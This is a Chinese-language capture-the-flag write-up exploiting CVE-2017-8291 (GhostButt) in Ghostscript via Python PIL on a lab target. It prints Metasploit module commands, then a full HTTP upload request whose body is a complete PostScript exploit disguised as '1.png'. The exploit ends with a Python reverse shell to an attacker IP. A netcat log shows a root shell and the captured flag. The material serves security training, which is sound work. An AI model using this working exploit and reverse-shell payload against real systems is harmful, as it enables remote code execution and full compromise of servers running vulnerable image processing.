CVE-2017-8291

信息

靶标介绍：

Python中处理图片的模块PIL（Pillow），因为其内部调用了GhostScript而受到GhostButt漏洞（CVE-2017-8291）的影响，造成远程命令执行漏洞。

• CVE

入口点

http://e0e73c50-7392-42b3-9b5d-fc22a78e8cf2-488.cyberstrikelab.com:83/

参考 neargle/PIL-RCE-By-GhostButt: Exploiting Python PIL Module Command Execution Vulnerability 复现即可

或者直接借助 Metasploit

msf > use exploit/unix/fileformat/ghostscript_type_confusion
[*] No payload configured, defaulting to cmd/unix/php/meterpreter/reverse_tcp
msf exploit(unix/fileformat/ghostscript_type_confusion) > set lhost 8.***.***.180
lhost => 8.129.29.180
msf exploit(unix/fileformat/ghostscript_type_confusion) > set lport 10001
lport => 10001
msf exploit(unix/fileformat/ghostscript_type_confusion) > run 
[+] msf.eps stored at /home/randark/.msf4/local/msf.eps

使用 poc 上传即可

POST / HTTP/1.1
Host: e0e73c50-7392-42b3-9b5d-fc22a78e8cf2-488.cyberstrikelab.com:83
Content-Length: 2336
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://e0e73c50-7392-42b3-9b5d-fc22a78e8cf2-488.cyberstrikelab.com:83
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLkzYRNbx2tfqscN7
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://e0e73c50-7392-42b3-9b5d-fc22a78e8cf2-488.cyberstrikelab.com:83/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryLkzYRNbx2tfqscN7
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/png

%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100


/size_from  10000      def
/size_step    500      def
/size_to   65000      def
/enlarge    1000      def

%/bigarr 65000 array def

0
size_from size_step size_to {
    pop
    1 add
} for

/buffercount exch def

/buffersizes buffercount array def


0
size_from size_step size_to {
    buffersizes exch 2 index exch put
    1 add
} for
pop

/buffers buffercount array def

0 1 buffercount 1 sub {
    /ind exch def
    buffersizes ind get /cursize exch def
    cursize string /curbuf exch def
    buffers ind curbuf put
    cursize 16 sub 1 cursize 1 sub {
        curbuf exch 255 put
    } for
} for


/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def

enlarge array aload

{
    .eqproc
    buffersearchvars 0 buffersearchvars 0 get 1 add put
    buffersearchvars 1 0 put
    buffersearchvars 2 0 put
    buffercount {
        buffers buffersearchvars 1 get get
        buffersizes buffersearchvars 1 get get
        16 sub get
        254 le {
            buffersearchvars 2 1 put
            buffersearchvars 3 buffers buffersearchvars 1 get get put
            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
        } if
        buffersearchvars 1 buffersearchvars 1 get 1 add put
    } repeat

    buffersearchvars 2 get 1 ge {
        exit
    } if
    %(.) print
} loop

.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put


buffersearchvars 0 get array aload

sdevice 0 get
16#3e8 0 put

sdevice 0 get
16#3b0 0 put

sdevice 0 get
16#3f0 0 put


currentdevice null false mark /OutputFile (%pipe%python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("8.***.***.180",10001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")')
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf


------WebKitFormBoundaryLkzYRNbx2tfqscN7--

成功收到回显

root@jmt-projekt:~# nc -lvnp 10001
Listening on 0.0.0.0 10001
Connection received on 211.137.105.42 13668
# whoami
whoami
root
# cat /tmp/flag.txt
cat /tmp/flag.txt
go-flag{7b169dee-8836-482d-ba12-0611b5d8cef7}